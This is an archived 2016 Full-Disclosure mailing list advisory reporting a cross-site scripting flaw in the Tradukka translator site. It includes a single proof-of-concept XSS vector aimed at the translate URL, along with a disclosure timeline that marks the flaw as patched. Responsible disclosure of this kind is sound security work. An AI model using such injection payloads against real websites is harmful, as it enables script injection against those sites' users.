lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 4 Apr 2016 18:50:41 +0100
From: Francisco Javier Santiago Vázquez
 <franciscojaviersantiagovazquez@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Tradukka affected by Cross-Site Scripting

I. VULNERABILITY
-------------------------
Vulnerability Cross-Site Scripting (XSS)


II. PROOF OF CONCEPT
-------------------------
URL: http://tradukka.com/translate/en/es/
State: Fix & Patch
Vector: '><img src=x onerror=alert("XSS");>


III. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the Translator Tradukka: http://tradukka.com


IV. CREDITS
-------------------------
These vulnerabilities have been discovered by
Francisco Javier Santiago Vázquez  aka "n0ipr0cs" (
https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050).
(https://twitter.com/n0ipr0cs).


V. DISCLOSURE TIMELINE
-------------------------
April 03, 2016: Vulnerability acquired by Francisco Javier Santiago
Vázquez.
aka "n0ipr0cs"
April  03, 2016 Responsible disclosure to Tradukka Security Team.
April  04, 2016 Solution - Fix & Patch
April  04, 2016 Disclosure


VI. Links
------------------------
POC :- http://www.estacion-informatica.com/2016/04/xss-en-tradukka.html
<http://www.estacion-informatica.com/2015/11/el-no-cross-site-scripting-de-google.html>







*Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst
<http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6>
<http://estacioninformatica.blogspot.com.es/>
<https://twitter.com/n0ipr0cs>*

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists